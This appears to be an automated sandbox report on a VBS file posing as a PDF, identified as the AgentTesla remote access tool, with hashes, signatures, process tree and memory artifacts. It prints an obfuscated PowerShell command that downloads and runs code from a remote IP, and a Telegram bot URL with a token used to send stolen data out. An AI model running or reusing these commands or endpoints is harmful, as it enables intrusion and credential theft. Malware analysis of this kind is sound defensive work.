Analysis
- max time kernel: 131s
- max time network: 124s
- platform: windows10_x64
- resource: win10-en-20211014
- submitted: 21-10-2021 21:38
Static task: static1
Behavioral task: behavioral1
  Sample: 183287857-050118-sanlccjavap0004-6561_PDF.vbs
  Resource: win7-en-20210920
Behavioral task: behavioral2
  Sample: 183287857-050118-sanlccjavap0004-6561_PDF.vbs
  Resource: win10-en-20211014
General
- Target: 183287857-050118-sanlccjavap0004-6561_PDF.vbs
- Size: 440B
- MD5: fd5d9dd54f30ebeda49b3f3d9d57d1c6
- SHA1: bdc86ae73f8ea542af15ed6a5643b1a9cfd8ea51
- SHA256: 75e81b26f76f0050408e59a9d3606e0ee6d474ffa9e2296187f582884fa2f59f
- SHA512: 60857407aa6143be42149dac675348dcbfaa1a9ed8dd66e66fe936dbabca8dd490d3019573fe940631741047e7edb0b0df9730a33ccaf48aed077e939608b7b9
Malware Config
- Extracted: http://202.55.132.106/Bypass3.txt
- Extracted (agenttesla): https://api.telegram.org/bot1923270472:AAFHljVp-f8Q5-X0iy70Vfe0aTch5THPa-U/sendDocument
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in Visual Basic.
-
AgentTesla Payload (3 IoCs)
Processes:
  resource                                                                      yara_rule
  behavioral2/memory/1776-150-0x000000000043774E-mapping.dmp                    family_agenttesla
  behavioral2/memory/1776-152-0x00000000009A0000-0x00000000009DC000-memory.dmp  family_agenttesla
  behavioral2/memory/1776-156-0x0000000005330000-0x000000000582E000-memory.dmp  family_agenttesla
Blocklisted process makes network request (2 IoCs)
Processes: powershell.exe
  flow  pid   process
  10    2116  powershell.exe
  24    2116  powershell.exe
Accesses Microsoft Outlook profiles (1 TTPs, 3 IoCs)
Processes: aspnet_compiler.exe
  description  ioc                                                                                                                                                               process
  Key opened   \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676                           aspnet_compiler.exe
  Key opened   \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  aspnet_compiler.exe
  Key opened   \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676                           aspnet_compiler.exe
Suspicious use of SetThreadContext (1 IoCs)
Processes: powershell.exe
  description                          pid   process         target process
  PID 2116 set thread context of 1776  2116  powershell.exe  aspnet_compiler.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes: powershell.exe, aspnet_compiler.exe
  pid   process
  2116  powershell.exe
  2116  powershell.exe
  2116  powershell.exe
  1776  aspnet_compiler.exe
  1776  aspnet_compiler.exe
Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes: powershell.exe, aspnet_compiler.exe
  description              pid   process
  Token: SeDebugPrivilege  2116  powershell.exe
  Token: SeDebugPrivilege  1776  aspnet_compiler.exe
Suspicious use of SetWindowsHookEx (1 IoCs)
Processes: aspnet_compiler.exe
  pid   process
  1776  aspnet_compiler.exe
Suspicious use of WriteProcessMemory (10 IoCs)
Processes: WScript.exe, powershell.exe
  description                       pid   process         target process
  PID 3068 wrote to memory of 2116  3068  WScript.exe     powershell.exe
  PID 3068 wrote to memory of 2116  3068  WScript.exe     powershell.exe
  PID 2116 wrote to memory of 1776  2116  powershell.exe  aspnet_compiler.exe
  PID 2116 wrote to memory of 1776  2116  powershell.exe  aspnet_compiler.exe
  PID 2116 wrote to memory of 1776  2116  powershell.exe  aspnet_compiler.exe
  PID 2116 wrote to memory of 1776  2116  powershell.exe  aspnet_compiler.exe
  PID 2116 wrote to memory of 1776  2116  powershell.exe  aspnet_compiler.exe
  PID 2116 wrote to memory of 1776  2116  powershell.exe  aspnet_compiler.exe
  PID 2116 wrote to memory of 1776  2116  powershell.exe  aspnet_compiler.exe
  PID 2116 wrote to memory of 1776  2116  powershell.exe  aspnet_compiler.exe
outlook_office_path (1 IoCs)
Processes: aspnet_compiler.exe
  description  ioc                                                                                                                                  process
  Key opened   \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  aspnet_compiler.exe
outlook_win_path (1 IoCs)
Processes: aspnet_compiler.exe
  description  ioc                                                                                                                                                               process
  Key opened   \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  aspnet_compiler.exe
Processes
1. C:\Windows\System32\WScript.exe
   Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\183287857-050118-sanlccjavap0004-6561_PDF.vbs"
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" &('{1}{0}'-f'X','IE')(&('{1}{0}{2}' -f'je','New-Ob','ct') ('{1}{2}{0}' -f 'WebClient','Ne','t.')).('{2}{3}{1}{0}' -f'dString','nloa','D','ow').InVoKe('http://202.55.132.106/Bypass3.txt')
      - Blocklisted process makes network request
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
         Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
         - Accesses Microsoft Outlook profiles
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious use of SetWindowsHookEx
         - outlook_office_path
         - outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
  file                                                              filesize
  memory/1776-149-0x0000000000400000-0x000000000043C000-memory.dmp  240KB
  memory/1776-160-0x00000000011D0000-0x00000000011D1000-memory.dmp  4KB
  memory/1776-159-0x0000000006660000-0x0000000006661000-memory.dmp  4KB
  memory/1776-158-0x0000000005F90000-0x0000000005F91000-memory.dmp  4KB
  memory/1776-157-0x00000000053B0000-0x00000000053B1000-memory.dmp  4KB
  memory/1776-156-0x0000000005330000-0x000000000582E000-memory.dmp  5.0MB
  memory/1776-155-0x00000000053D0000-0x00000000053D1000-memory.dmp  4KB
  memory/1776-154-0x0000000005830000-0x0000000005831000-memory.dmp  4KB
  memory/1776-152-0x00000000009A0000-0x00000000009DC000-memory.dmp  240KB
  memory/1776-150-0x000000000043774E-mapping.dmp                    (no size listed)
  memory/2116-122-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmp  8KB
  memory/2116-124-0x000001DAFF1E0000-0x000001DAFF1E1000-memory.dmp  4KB
  memory/2116-127-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmp  8KB
  memory/2116-131-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmp  8KB
  memory/2116-132-0x000001DAFDE76000-0x000001DAFDE78000-memory.dmp  8KB
  memory/2116-133-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmp  8KB
  memory/2116-143-0x000001DAFF190000-0x000001DAFF1B4000-memory.dmp  144KB
  memory/2116-148-0x000001DAFF1C0000-0x000001DAFF1C1000-memory.dmp  4KB
  memory/2116-126-0x000001DAFDE73000-0x000001DAFDE75000-memory.dmp  8KB
  memory/2116-125-0x000001DAFDE70000-0x000001DAFDE72000-memory.dmp  8KB
  memory/2116-151-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmp  8KB
  memory/2116-123-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmp  8KB
  memory/2116-115-0x0000000000000000-mapping.dmp                    (no size listed)
  memory/2116-121-0x000001DAFEE30000-0x000001DAFEE31000-memory.dmp  4KB
  memory/2116-120-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmp  8KB
  memory/2116-119-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmp  8KB
  memory/2116-118-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmp  8KB
  memory/2116-117-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmp  8KB
  memory/2116-116-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmp  8KB